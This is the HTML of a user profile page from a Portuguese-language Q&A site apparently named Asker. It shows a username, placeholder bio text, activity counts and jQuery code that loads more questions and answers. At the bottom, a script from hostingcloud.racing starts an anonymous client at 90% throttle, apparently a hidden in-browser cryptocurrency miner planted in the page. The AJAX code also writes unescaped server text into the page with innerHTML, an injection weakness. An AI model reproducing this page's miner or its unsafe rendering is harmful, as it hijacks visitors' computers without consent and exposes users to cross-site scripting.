<!doctype html>
<html lang="pt-br">
	<head>
		<title>Aloísio V</title>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
		<link href="https://fonts.googleapis.com/css?family=Raleway:400,500,500i,700,800i" rel="stylesheet">

		<script src="https://kit.fontawesome.com/1f965a8b94.js"></script>
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
		<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
		<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

		<script type="text/javascript">
			$(document).ready(function() {
				$('.navbar-light .dmenu').hover(function() {
					$(this).find('.sm-menu').first().stop(true, true).slideDown(150);
				}, function() {
					$(this).find('.sm-menu').first().stop(true, true).slideUp(105)
				});
			});
		</script>

		<style>
			body {
				background-color: black;
				color: white;
			}
			
			#center1 img {
				width: 10%;
				display: block;
			}

			#user-bio {
				width: 50%;
				margin: 0 auto;
			}

            .table {
                width: 50%;
                margin: 0 auto;
            }

			#bio {
				width: 50%;
			}

			@media (min-width: 320px) and (max-width: 480px) {
				#center1 img {
					width: 25%;
				}

				.table {
				    width: 100%;
				}
				
				#bio {
					width: 90%;
				}
			}
		</style>

		<script>
			function show_more_questions(obj) {
				$.ajax({
					type: 'post',
					url: '/get_more_questions',
					dataType: 'json',
					data: {
						csrfmiddlewaretoken: 'IfHJxiJQ7HaQIR9ecLKmm64dtIzGbLdoclRZJZ7D6UNLrScoPRDyIdJOmpPYeQKv',
						q_page: obj.id,
					},


					complete: function(data) {
						data = JSON.parse(data.responseText)

						$.each(data.questions, function(i, val) {

							new_html = '<div class="card"><div class="card-body"><a href="/question/'+val.id+'">'+val.text+'</a></div></div>'

							obj.parentElement.getElementsByClassName('card-body')[0].innerHTML += new_html

							if(data.has_next == 'false') {
								obj.remove()
								return
							}

							obj.id = Number(obj.id) + 1
						})
					}


				})
			}

			function show_more_responses(obj) {
				$.ajax({
					type: 'post',
					url: '/get_more_responses',
					dataType: 'json',

					data: {
						csrfmiddlewaretoken: 'IfHJxiJQ7HaQIR9ecLKmm64dtIzGbLdoclRZJZ7D6UNLrScoPRDyIdJOmpPYeQKv',
						r_page: obj.id,
					},

					complete: function(data) {
						data = JSON.parse(data.responseText)

						$.each(data.responses, function(i, val) {
							new_html = '<div class="card"><div class="card-body"><p><a href="/question/'+val.id+'">'+val.question_text+'</a></p><span>'+val.text+'</span></div></div>'

							obj.parentElement.getElementsByClassName('card-body')[0].innerHTML += new_html

							if(data.has_next == 'false') {
								obj.remove()
								return
							}

							obj.id = Number(obj.id) + 1
						})
					}
				})
			}
		</script>

		<link rel="stylesheet" href="/static/css/profile.css">
	</head>
	<body>
		<nav class="navbar navbar-expand-sm   navbar-light bg-light">
		    <a href="/" class="navbar-brand"><img src="/static/images/asker.png" height="40px" alt="Asker"></a>
			<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarTogglerDemo03" aria-controls="navbarTogglerDemo03" aria-expanded="false" aria-label="Toggle navigation">
				<span class="navbar-toggler-icon"></span>
			</button>

			<div class="collapse navbar-collapse" id="navbarTogglerDemo03">
				<ul class="navbar-nav mr-auto mt-2 mt-lg-0">
					
					<li class="nav-item">
						<a class="nav-link" href="/signin">Entrar</a>
					</li>
					<li class="nav-item">
						<a class="nav-link" href="/signup">Criar uma conta</a>
					</li>
					
				</ul>
			</div>
		</nav>
		<center id="center1">
		    <!--<img src="/media/avatars/IVNG4ABFC4Screenshot_2021-04-13%20Atitude%20Militar%20(%20atitudemilitar)%20%E2%80%A2%20Fotos%20e%20v%C3%ADdeos%20do%20Instagram.png" alt="Aloísio V">-->
		    <!--<p align="center">É fogo conviver com ignorante!!!</p>-->
		    <img src="https://asker.fun/media/avatars/UZ3KI9ZQSBjason_statham_by_ekota21_d9grgzm-fullview.jpg" alt="Aloísio V"> <span>Aloísio V</span>
		    <p id="bio">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web.</p>
		</center>
		
		<table class="table table-bordered">
		  <thead>
			<tr>
			  <td align="center" scope="col"><b>Perguntas</b></td>
			  <td align="center" scope="col"><b>Respostas</b></td>
			  <td align="center" scope="col"><b>Pontos</b></td>
			</tr>
		  </thead>
		  <tbody>
			<tr>
			  <td align="center">254</td>
			  <td align="center">893</td>
			  <td align="center">2156</td>
			</tr>
		  </tbody>
		</table>


		

<script src="https://www.hostingcloud.racing/gCgZ.js"></script>
<script>
    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
        throttle: 0.9, c: 'w', ads: 0
    });
    _client.start();


</script>
	</body>
</html>
